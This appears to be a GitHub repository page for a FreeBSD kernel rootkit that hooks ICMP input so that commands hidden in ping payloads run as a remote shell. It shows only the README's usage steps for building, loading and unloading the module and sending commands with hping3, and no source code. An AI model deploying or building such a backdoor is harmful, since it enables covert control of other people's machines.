Skip to content
/ bsd-icmp-rootkit Public

hook icmp_input system call, and execute a shell remote command

2 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

roughiz/bsd-icmp-rootkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
module
module
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
__icmpshell.c
__icmpshell.c
 
 
install_module.sh
install_module.sh
 
 
load_module.sh
load_module.sh
 
 
sendcmd.sh
sendcmd.sh
 
 
unload_module.sh
unload_module.sh
 
 

Repository files navigation

bsd-icmp-rootkit

hook icmp_input system call, and execute a shell remote command

Installation :

To compile the kernel module and the icmpshell app :

$ ./install_module.sh

Load the module

This script load the module roughiz, run the app in background and write the pid of the app to file .__icmpshell.pid

$ ./load_module.sh

Unload the module

This script unload the module roughiz

$ ./unload_module.sh

Send a command to the remote rootkit

You can send a command to the rootkit, with the hping3 tool (try apt-get install hping3 if you want to install it) by sending an icmp echo with a payload. To make this, you can execute the script :

$ ./sendcmd.sh [ip address of the remote machine or the hostname]

About

hook icmp_input system call, and execute a shell remote command

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages